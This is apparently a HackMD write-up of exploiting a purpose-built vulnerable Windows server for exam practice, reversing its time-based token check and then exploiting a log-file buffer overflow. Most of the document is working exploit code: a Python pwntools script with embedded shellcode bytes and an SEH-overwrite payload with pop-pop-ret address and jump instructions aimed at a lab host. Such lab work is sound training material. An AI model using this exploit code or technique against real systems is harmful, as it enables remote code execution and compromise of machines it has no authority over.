# Lets learn Reverse Engineer 3! ###### tags: `reverse engineering`, `windows`, `pwn` One of the OSED student has kindly write some vulnerable server for us to practice. Below is the link and release version: https://github.com/bmdyy/signatus ## First deobfuscation ![](https://i.imgur.com/n4ygLQV.png) This seems like some obfuscation but actually edi still ends up as the same value you send in **little endian**. ## Second deobfuscation ``` .text:60AE1397 01C or edi, eax ; edi still looks like the original packet .text:60AE1399 01C call ds:_time64 ``` From msdn, ``` _time64 returns the time as seconds elapsed since midnight, January 1, 1970, or -1 in the case of an error. ``` To do this in python3, we just ``` import time ticks = time.time() print("Time = ", hex(int(ticks))) ``` Output from time64 is then sent into `sub_60AE2490`. After more deobfuscation, my final script is ``` from pwn import * import time; # This is required to include time module. def sub_60AE2490(): ecx = 0xa eax = 0x0 eax = eax / ecx ebx = eax eax = (int(time.time())) print("time = ", hex(eax)) eax1 = eax eax = eax1 // ecx edx = eax1 % ecx edx = ebx print("ecx = ", hex(ecx)) print("eax = ", (eax)) return eax #After sub_60AE2490 to 0x60AE13E3 def algo2(result): eax = result.to_bytes(4, byteorder='big') esi = eax[3] eax = esi eax = eax * esi ecx = eax ecx = ecx * esi edx = ecx ecx = ecx * esi edx = edx & 0xFFFFFF00 edx = edx << 4 edx = edx | eax edx = edx & 0xFFFFFFF0 ecx = ecx & 0xFFFFF000 ecx = (ecx << 8) & 0xffffffff edx = edx | ecx edx = (edx << 4) & 0xffffffff edx = edx | esi edx = edx ^ 0x74829726 print("Final result = ", hex(edx)) return edx p = remote("192.168.106.136", 9999) result = sub_60AE2490() print("Result of sub_60AE2490 =" ,hex(result)) result = algo2(result) packet1 = p32(result) p.sendline(packet1) p.interactive() ``` Finally getting the correct otd... ![](https://i.imgur.com/iynhkfv.png) ## Moving on.. After OTD is verified, a recv is called again which receives the opcode. Opcode 1: It allows us to write a buffer into a log file. Opcode 2: It allows us to read the log file. The vuln is easy to detect. In opcode 2, a size of 0x800 buffer is allocated to read the file. However, the file can have more than 0x800, which will cause a crash. In order to trigger a vuln, we will write 0x800 bytes into the log twice. Now the log stores 0x1000. Then we retrieve the file. ## Onward to real exploitation (hopefully) ` 009effcc: 65413465 Invalid exception stack at 41336541 ` Subsequently, its a normal nSEH overflow. 1) Detect bad characters 2) Short jump in front to skip the nSEH byte code 3) Jmp backwards into our shellcode ![](https://i.imgur.com/pJlTq4s.png) Hooray! ## Final POC ``` from pwn import * import time; # This is required to include time module. buf = b"\xCC" buf += b"\xd9\xe5\xbb\x08\xe2\x29\xf1\xd9\x74\x24\xf4\x5d\x29" buf += b"\xc9\xb1\x52\x83\xed\xfc\x31\x5d\x13\x03\x55\xf1\xcb" buf += b"\x04\x99\x1d\x89\xe7\x61\xde\xee\x6e\x84\xef\x2e\x14" buf += b"\xcd\x40\x9f\x5e\x83\x6c\x54\x32\x37\xe6\x18\x9b\x38" buf += b"\x4f\x96\xfd\x77\x50\x8b\x3e\x16\xd2\xd6\x12\xf8\xeb" buf += b"\x18\x67\xf9\x2c\x44\x8a\xab\xe5\x02\x39\x5b\x81\x5f" buf += b"\x82\xd0\xd9\x4e\x82\x05\xa9\x71\xa3\x98\xa1\x2b\x63" buf += b"\x1b\x65\x40\x2a\x03\x6a\x6d\xe4\xb8\x58\x19\xf7\x68" buf += b"\x91\xe2\x54\x55\x1d\x11\xa4\x92\x9a\xca\xd3\xea\xd8" buf += b"\x77\xe4\x29\xa2\xa3\x61\xa9\x04\x27\xd1\x15\xb4\xe4" buf += b"\x84\xde\xba\x41\xc2\xb8\xde\x54\x07\xb3\xdb\xdd\xa6" buf += b"\x13\x6a\xa5\x8c\xb7\x36\x7d\xac\xee\x92\xd0\xd1\xf0" buf += b"\x7c\x8c\x77\x7b\x90\xd9\x05\x26\xfd\x2e\x24\xd8\xfd" buf += b"\x38\x3f\xab\xcf\xe7\xeb\x23\x7c\x6f\x32\xb4\x83\x5a" buf += b"\x82\x2a\x7a\x65\xf3\x63\xb9\x31\xa3\x1b\x68\x3a\x28" buf += b"\xdb\x95\xef\xff\x8b\x39\x40\x40\x7b\xfa\x30\x28\x91" buf += b"\xf5\x6f\x48\x9a\xdf\x07\xe3\x61\x88\xe7\x5c\x03\xe0" buf += b"\x80\x9e\xd3\xf1\xeb\x16\x35\x9b\x1b\x7f\xee\x34\x85" buf += b"\xda\x64\xa4\x4a\xf1\x01\xe6\xc1\xf6\xf6\xa9\x21\x72" buf += b"\xe4\x5e\xc2\xc9\x56\xc8\xdd\xe7\xfe\x96\x4c\x6c\xfe" buf += b"\xd1\x6c\x3b\xa9\xb6\x43\x32\x3f\x2b\xfd\xec\x5d\xb6" buf += b"\x9b\xd7\xe5\x6d\x58\xd9\xe4\xe0\xe4\xfd\xf6\x3c\xe4" buf += b"\xb9\xa2\x90\xb3\x17\x1c\x57\x6a\xd6\xf6\x01\xc1\xb0" buf += b"\x9e\xd4\x29\x03\xd8\xd8\x67\xf5\x04\x68\xde\x40\x3b" buf += b"\x45\xb6\x44\x44\xbb\x26\xaa\x9f\x7f\x56\xe1\xbd\xd6" buf += b"\xff\xac\x54\x6b\x62\x4f\x83\xa8\x9b\xcc\x21\x51\x58" buf += b"\xcc\x40\x54\x24\x4a\xb9\x24\x35\x3f\xbd\x9b\x36\x6a" def sub_60AE2490(): ecx = 0xa eax = 0x0 eax = eax / ecx ebx = eax eax = (int(time.time())) print("time = ", hex(eax)) eax1 = eax eax = eax1 // ecx edx = eax1 % ecx edx = ebx print("ecx = ", hex(ecx)) print("eax = ", (eax)) return eax #After sub_60AE2490 to 0x60AE13E3 def algo2(result): eax = result.to_bytes(4, byteorder='big') esi = eax[3] eax = esi eax = eax * esi ecx = eax ecx = ecx * esi edx = ecx ecx = ecx * esi edx = edx & 0xFFFFFF00 edx = edx << 4 edx = edx | eax edx = edx & 0xFFFFFFF0 ecx = ecx & 0xFFFFF000 ecx = (ecx << 8) & 0xffffffff edx = edx | ecx edx = (edx << 4) & 0xffffffff edx = edx | esi edx = edx ^ 0x74829726 print("Final result = ", hex(edx)) return edx p = remote("192.168.106.181", 9999) result = sub_60AE2490() print("Result of sub_60AE2490 =" ,hex(result)) result = algo2(result) OTDToken = p32(result) p.send(OTDToken) ### Opcode PutBufferOpcode = p32(0x1) RetrieveOpcode = p32(0x2) CleanOpcode = p32(0x3) ################ Clean logs first ################ choice = CleanOpcode p.send(choice) if(choice == p32(0x1)): print("sending buffer") bufferFile = b"\x41" * 0x5000 p.send(bufferFile) p.close() ################ Send buffer ################ p = remote("192.168.106.181", 9999) result = sub_60AE2490() print("Result of sub_60AE2490 =" ,hex(result)) result = algo2(result) OTDToken = p32(result) p.send(OTDToken) ### Opcode PutBufferOpcode = p32(0x1) RetrieveOpcode = p32(0x2) CleanOpcode = p32(0x3) ## Clean logs first choice = PutBufferOpcode p.send(choice) if(choice == p32(0x1)): print("sending buffer") bufferFile = b"\x42" * (0x7FF - len(buf)) bufferFile += buf p.send(bufferFile) p.close() ################ Send buffer ################ p = remote("192.168.106.181", 9999) result = sub_60AE2490() print("Result of sub_60AE2490 =" ,hex(result)) result = algo2(result) OTDToken = p32(result) p.send(OTDToken) ### Opcode PutBufferOpcode = p32(0x1) RetrieveOpcode = p32(0x2) CleanOpcode = p32(0x3) ## Clean logs first choice = PutBufferOpcode p.send(choice) length = 0x7FF if(choice == p32(0x1)): print("sending buffer") #bufferFile = b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq' bufferFile = b'\xCC' * 129 bufferFile += p32(0xCC90eb06, endian='big') #0xCC, nop, jmp short 0x6 bufferFile += p32(0x60ae1bbc) #RIP Control (pop, pop ret) bufferFile += b"\x90" * 0x10 bufferFile += b'\xe9\xfc\xfa\xff\xff' #jmp -0x500 bufferFile += b"\x41" * (length - len(bufferFile)) p.send(bufferFile) p.close() ################ Retrieve file & crash ################ p = remote("192.168.106.181", 9999) result = sub_60AE2490() print("Result of sub_60AE2490 =" ,hex(result)) result = algo2(result) OTDToken = p32(result) p.send(OTDToken) ### Opcode PutBufferOpcode = p32(0x1) RetrieveOpcode = p32(0x2) CleanOpcode = p32(0x3) ## Clean logs first choice = RetrieveOpcode p.send(choice) if(choice == p32(0x1)): print("sending buffer") bufferFile = b"\x42" * 0x7FF p.send(bufferFile) p.interactive() ```
Last changed by  
n00bsh1t
133

Read more

Patch

From 9b75f0de94978a681682cf13d392b0db7fa4161a Mon Sep 17 00:00:00 2001 From: Your Name <you@example.com> Date: Thu, 17 Feb 2022 16:09:17 +0000 Subject: [PATCH] Cool new Implementation --- js/src/gc/Nursery.cpp | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/js/src/gc/Nursery.cpp b/js/src/gc/Nursery.cpp

6/23/2022
Compiling Firefox

DockerFile FROM ubuntu:latest LABEL maintainer="James Turner" ENV SHELL /bin/bash ENV PATH="/root/.cargo/bin:${PATH}" RUN apt-get update && \ apt-get install -y wget python clang llvm python3 python python3-pip

9/7/2021
Calc

Learning Points: Fuzz it a little... +0 +10000000 +++++ 1+1*1-1 ...

8/16/2021
IJCTF2021 baby-sum

Baby-sum pwn challenge from IJCTF 2021. The author for the challenge is @whoamiT and it is solved by @thonk. Sample running of binary Take note of the red underline. The binary first takes in a name input and subsequent 3 number input. Vulnerability There are 3 main vulnerabilities:

7/28/2021
Read more from n00bsh1t
Published on HackMD